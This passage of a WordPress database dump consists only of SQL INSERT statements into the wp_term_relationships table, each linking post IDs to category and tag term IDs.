INSERT INTO `wp_term_relationships` VALUES (818, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (818, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (818, 113, 0); 
INSERT INTO `wp_term_relationships` VALUES (819, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (819, 97, 0); 
INSERT INTO `wp_term_relationships` VALUES (819, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (819, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (819, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (819, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (819, 113, 0); 
INSERT INTO `wp_term_relationships` VALUES (821, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (821, 97, 0); 
INSERT INTO `wp_term_relationships` VALUES (821, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (821, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (821, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (821, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (821, 113, 0); 
INSERT INTO `wp_term_relationships` VALUES (822, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (822, 97, 0); 
INSERT INTO `wp_term_relationships` VALUES (822, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (822, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (822, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (822, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (822, 113, 0); 
INSERT INTO `wp_term_relationships` VALUES (823, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (823, 97, 0); 
INSERT INTO `wp_term_relationships` VALUES (823, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (823, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (823, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (823, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (823, 113, 0); 
INSERT INTO `wp_term_relationships` VALUES (824, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (824, 97, 0); 
INSERT INTO `wp_term_relationships` VALUES (824, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (824, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (824, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (824, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (824, 113, 0); 
INSERT INTO `wp_term_relationships` VALUES (842, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (842, 137, 0); 
INSERT INTO `wp_term_relationships` VALUES (843, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (843, 98, 0); 
INSERT INTO `wp_term_relationships` VALUES (843, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (843, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (843, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (843, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (843, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (843, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (844, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (844, 98, 0); 
INSERT INTO `wp_term_relationships` VALUES (844, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (844, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (844, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (844, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (844, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (844, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (846, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (846, 98, 0); 
INSERT INTO `wp_term_relationships` VALUES (846, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (846, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (846, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (846, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (846, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (846, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (847, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (847, 98, 0); 
INSERT INTO `wp_term_relationships` VALUES (847, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (847, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (847, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (847, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (847, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (847, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (848, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (848, 98, 0); 
INSERT INTO `wp_term_relationships` VALUES (848, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (848, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (848, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (848, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (848, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (848, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (850, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (850, 98, 0); 
INSERT INTO `wp_term_relationships` VALUES (850, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (850, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (850, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (850, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (850, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (850, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (852, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (852, 98, 0); 
INSERT INTO `wp_term_relationships` VALUES (852, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (852, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (852, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (852, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (852, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (852, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (861, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (861, 137, 0); 
INSERT INTO `wp_term_relationships` VALUES (862, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (862, 38, 0); 
INSERT INTO `wp_term_relationships` VALUES (862, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (862, 136, 0); 
INSERT INTO `wp_term_relationships` VALUES (868, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (868, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (868, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (868, 130, 0); 
INSERT INTO `wp_term_relationships` VALUES (868, 132, 0); 
INSERT INTO `wp_term_relationships` VALUES (868, 133, 0); 
INSERT INTO `wp_term_relationships` VALUES (868, 134, 0); 
INSERT INTO `wp_term_relationships` VALUES (868, 135, 0); 
INSERT INTO `wp_term_relationships` VALUES (877, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (877, 137, 0); 
INSERT INTO `wp_term_relationships` VALUES (878, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (878, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (878, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (878, 130, 0); 
INSERT INTO `wp_term_relationships` VALUES (878, 132, 0); 
INSERT INTO `wp_term_relationships` VALUES (878, 133, 0); 
INSERT INTO `wp_term_relationships` VALUES (878, 134, 0); 
INSERT INTO `wp_term_relationships` VALUES (878, 135, 0); 
INSERT INTO `wp_term_relationships` VALUES (880, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (880, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (880, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (880, 130, 0); 
INSERT INTO `wp_term_relationships` VALUES (880, 132, 0); 
INSERT INTO `wp_term_relationships` VALUES (880, 133, 0); 
INSERT INTO `wp_term_relationships` VALUES (880, 134, 0); 
INSERT INTO `wp_term_relationships` VALUES (880, 135, 0); 
INSERT INTO `wp_term_relationships` VALUES (881, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (881, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (881, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (881, 130, 0); 
INSERT INTO `wp_term_relationships` VALUES (881, 132, 0); 
INSERT INTO `wp_term_relationships` VALUES (881, 133, 0); 
INSERT INTO `wp_term_relationships` VALUES (881, 134, 0); 
INSERT INTO `wp_term_relationships` VALUES (881, 135, 0); 
INSERT INTO `wp_term_relationships` VALUES (882, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (882, 137, 0); 
INSERT INTO `wp_term_relationships` VALUES (885, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (885, 137, 0); 
INSERT INTO `wp_term_relationships` VALUES (887, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (887, 137, 0); 
INSERT INTO `wp_term_relationships` VALUES (888, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (888, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (888, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (888, 131, 0); 
INSERT INTO `wp_term_relationships` VALUES (888, 132, 0); 
INSERT INTO `wp_term_relationships` VALUES (888, 139, 0); 
INSERT INTO `wp_term_relationships` VALUES (888, 140, 0); 
INSERT INTO `wp_term_relationships` VALUES (888, 141, 0); 
INSERT INTO `wp_term_relationships` VALUES (891, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (891, 138, 0); 
INSERT INTO `wp_term_relationships` VALUES (895, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (895, 138, 0); 
INSERT INTO `wp_term_relationships` VALUES (900, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (900, 138, 0); 
INSERT INTO `wp_term_relationships` VALUES (903, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (903, 142, 0); 
INSERT INTO `wp_term_relationships` VALUES (910, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (910, 142, 0); 
INSERT INTO `wp_term_relationships` VALUES (912, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (912, 142, 0); 
INSERT INTO `wp_term_relationships` VALUES (918, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (918, 144, 0); 
INSERT INTO `wp_term_relationships` VALUES (924, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (924, 145, 0); 
INSERT INTO `wp_term_relationships` VALUES (928, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (937, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (937, 145, 0); 
INSERT INTO `wp_term_relationships` VALUES (939, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (939, 145, 0); 
INSERT INTO `wp_term_relationships` VALUES (941, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (941, 145, 0); 
INSERT INTO `wp_term_relationships` VALUES (943, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (943, 38, 0); 
INSERT INTO `wp_term_relationships` VALUES (943, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (943, 140, 0); 
INSERT INTO `wp_term_relationships` VALUES (943, 141, 0); 
INSERT INTO `wp_term_relationships` VALUES (943, 146, 0); 
INSERT INTO `wp_term_relationships` VALUES (943, 147, 0); 
INSERT INTO `wp_term_relationships` VALUES (943, 148, 0); 
INSERT INTO `wp_term_relationships` VALUES (944, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (944, 38, 0); 
INSERT INTO `wp_term_relationships` VALUES (944, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (944, 140, 0); 
INSERT INTO `wp_term_relationships` VALUES (944, 141, 0); 
INSERT INTO `wp_term_relationships` VALUES (944, 146, 0); 
INSERT INTO `wp_term_relationships` VALUES (944, 147, 0); 
INSERT INTO `wp_term_relationships` VALUES (944, 148, 0); 
INSERT INTO `wp_term_relationships` VALUES (948, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (948, 152, 0); 
INSERT INTO `wp_term_relationships` VALUES (952, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (952, 152, 0); 
INSERT INTO `wp_term_relationships` VALUES (954, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (954, 38, 0); 
INSERT INTO `wp_term_relationships` VALUES (954, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (954, 140, 0); 
INSERT INTO `wp_term_relationships` VALUES (954, 141, 0); 
INSERT INTO `wp_term_relationships` VALUES (954, 146, 0); 
INSERT INTO `wp_term_relationships` VALUES (954, 147, 0); 
INSERT INTO `wp_term_relationships` VALUES (954, 148, 0); 
INSERT INTO `wp_term_relationships` VALUES (955, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (955, 152, 0); 
INSERT INTO `wp_term_relationships` VALUES (956, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (956, 39, 0); 
INSERT INTO `wp_term_relationships` VALUES (956, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (956, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (956, 153, 0); 
INSERT INTO `wp_term_relationships` VALUES (956, 154, 0); 
INSERT INTO `wp_term_relationships` VALUES (960, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (960, 39, 0); 
INSERT INTO `wp_term_relationships` VALUES (960, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (960, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (960, 153, 0); 
INSERT INTO `wp_term_relationships` VALUES (960, 154, 0); 
INSERT INTO `wp_term_relationships` VALUES (967, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (967, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (967, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (967, 156, 0); 
INSERT INTO `wp_term_relationships` VALUES (967, 157, 0); 
INSERT INTO `wp_term_relationships` VALUES (967, 158, 0); 
INSERT INTO `wp_term_relationships` VALUES (967, 455, 0); 
INSERT INTO `wp_term_relationships` VALUES (968, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (968, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (968, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (968, 156, 0); 
INSERT INTO `wp_term_relationships` VALUES (968, 157, 0); 
INSERT INTO `wp_term_relationships` VALUES (968, 158, 0); 
INSERT INTO `wp_term_relationships` VALUES (970, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (970, 159, 0); 
INSERT INTO `wp_term_relationships` VALUES (973, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (973, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (973, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (973, 160, 0); 
INSERT INTO `wp_term_relationships` VALUES (973, 162, 0); 
INSERT INTO `wp_term_relationships` VALUES (973, 163, 0); 
INSERT INTO `wp_term_relationships` VALUES (973, 164, 0); 
INSERT INTO `wp_term_relationships` VALUES (977, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (977, 161, 0); 
INSERT INTO `wp_term_relationships` VALUES (984, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (984, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (984, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (984, 160, 0); 
INSERT INTO `wp_term_relationships` VALUES (984, 162, 0); 
INSERT INTO `wp_term_relationships` VALUES (984, 163, 0); 
INSERT INTO `wp_term_relationships` VALUES (984, 164, 0); 
INSERT INTO `wp_term_relationships` VALUES (986, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (986, 155, 0); 
INSERT INTO `wp_term_relationships` VALUES (989, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (989, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (989, 165, 0); 
INSERT INTO `wp_term_relationships` VALUES (989, 166, 0); 
INSERT INTO `wp_term_relationships` VALUES (989, 167, 0); 
INSERT INTO `wp_term_relationships` VALUES (992, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (992, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (992, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (992, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (992, 169, 0); 
INSERT INTO `wp_term_relationships` VALUES (992, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (992, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (993, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (993, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (993, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (993, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (993, 169, 0); 
INSERT INTO `wp_term_relationships` VALUES (993, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (993, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (994, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (994, 161, 0); 
INSERT INTO `wp_term_relationships` VALUES (995, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (995, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (995, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (995, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (995, 169, 0); 
INSERT INTO `wp_term_relationships` VALUES (995, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (995, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (996, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (996, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (996, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (996, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (996, 169, 0); 
INSERT INTO `wp_term_relationships` VALUES (996, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (996, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (997, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (997, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (997, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (997, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (997, 169, 0); 
INSERT INTO `wp_term_relationships` VALUES (997, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (997, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (998, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (998, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (998, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (998, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (998, 169, 0); 
INSERT INTO `wp_term_relationships` VALUES (998, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (998, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (999, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (999, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (999, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (999, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (999, 169, 0); 
INSERT INTO `wp_term_relationships` VALUES (999, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (999, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1001, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1001, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1001, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1001, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1001, 169, 0); 
INSERT INTO `wp_term_relationships` VALUES (1001, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1001, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1002, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1002, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1002, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1002, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1002, 170, 0); 
INSERT INTO `wp_term_relationships` VALUES (1002, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1002, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1009, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1009, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1009, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1009, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1009, 170, 0); 
INSERT INTO `wp_term_relationships` VALUES (1009, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1009, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1010, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1010, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1010, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1010, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1010, 170, 0); 
INSERT INTO `wp_term_relationships` VALUES (1010, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1010, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1011, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1011, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1011, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1011, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1011, 170, 0); 
INSERT INTO `wp_term_relationships` VALUES (1011, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1011, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1012, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1012, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1012, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1012, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1012, 170, 0); 
INSERT INTO `wp_term_relationships` VALUES (1012, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1012, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1014, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1014, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1014, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1014, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1014, 170, 0); 
INSERT INTO `wp_term_relationships` VALUES (1014, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1014, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1015, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1015, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1015, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1015, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1015, 170, 0); 
INSERT INTO `wp_term_relationships` VALUES (1015, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1015, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1016, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1016, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1016, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1016, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1016, 170, 0); 
INSERT INTO `wp_term_relationships` VALUES (1016, 172, 0); 
INSERT INTO `wp_term_relationships` VALUES (1016, 173, 0); 
INSERT INTO `wp_term_relationships` VALUES (1019, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1019, 174, 0); 
INSERT INTO `wp_term_relationships` VALUES (1031, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1031, 128, 0); 
INSERT INTO `wp_term_relationships` VALUES (1033, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1033, 128, 0); 
INSERT INTO `wp_term_relationships` VALUES (1035, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1035, 128, 0); 
INSERT INTO `wp_term_relationships` VALUES (1042, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1042, 128, 0); 
INSERT INTO `wp_term_relationships` VALUES (1059, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1059, 179, 0); 
INSERT INTO `wp_term_relationships` VALUES (1059, 436, 0); 
INSERT INTO `wp_term_relationships` VALUES (1061, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1061, 178, 0); 
INSERT INTO `wp_term_relationships` VALUES (1061, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1061, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1061, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1061, 441, 0); 
INSERT INTO `wp_term_relationships` VALUES (1061, 442, 0); 
INSERT INTO `wp_term_relationships` VALUES (1063, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1063, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1063, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1063, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1063, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1063, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1063, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1065, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1065, 176, 0); 
INSERT INTO `wp_term_relationships` VALUES (1065, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1065, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1065, 431, 0); 
INSERT INTO `wp_term_relationships` VALUES (1065, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1067, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1067, 175, 0); 
INSERT INTO `wp_term_relationships` VALUES (1067, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1067, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1067, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1067, 439, 0); 
INSERT INTO `wp_term_relationships` VALUES (1067, 440, 0); 
INSERT INTO `wp_term_relationships` VALUES (1069, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1069, 180, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 182, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 183, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 184, 0); 
INSERT INTO `wp_term_relationships` VALUES (1072, 518, 0); 
INSERT INTO `wp_term_relationships` VALUES (1077, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1077, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1077, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1077, 185, 0); 
INSERT INTO `wp_term_relationships` VALUES (1077, 186, 0); 
INSERT INTO `wp_term_relationships` VALUES (1077, 519, 0); 
INSERT INTO `wp_term_relationships` VALUES (1088, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1088, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (1088, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1088, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1088, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (1088, 171, 0); 
INSERT INTO `wp_term_relationships` VALUES (1088, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (1097, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1097, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1097, 150, 0); 
INSERT INTO `wp_term_relationships` VALUES (1097, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (1097, 191, 0); 
INSERT INTO `wp_term_relationships` VALUES (1100, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1100, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1100, 140, 0); 
INSERT INTO `wp_term_relationships` VALUES (1100, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1100, 193, 0); 
INSERT INTO `wp_term_relationships` VALUES (1100, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1102, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1102, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1102, 150, 0); 
INSERT INTO `wp_term_relationships` VALUES (1102, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (1102, 194, 0); 
INSERT INTO `wp_term_relationships` VALUES (1102, 195, 0); 
INSERT INTO `wp_term_relationships` VALUES (1104, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1104, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1104, 150, 0); 
INSERT INTO `wp_term_relationships` VALUES (1104, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (1104, 196, 0); 
INSERT INTO `wp_term_relationships` VALUES (1106, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1106, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1106, 150, 0); 
INSERT INTO `wp_term_relationships` VALUES (1106, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (1106, 197, 0); 
INSERT INTO `wp_term_relationships` VALUES (1111, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1111, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (1111, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1111, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (1111, 171, 0); 
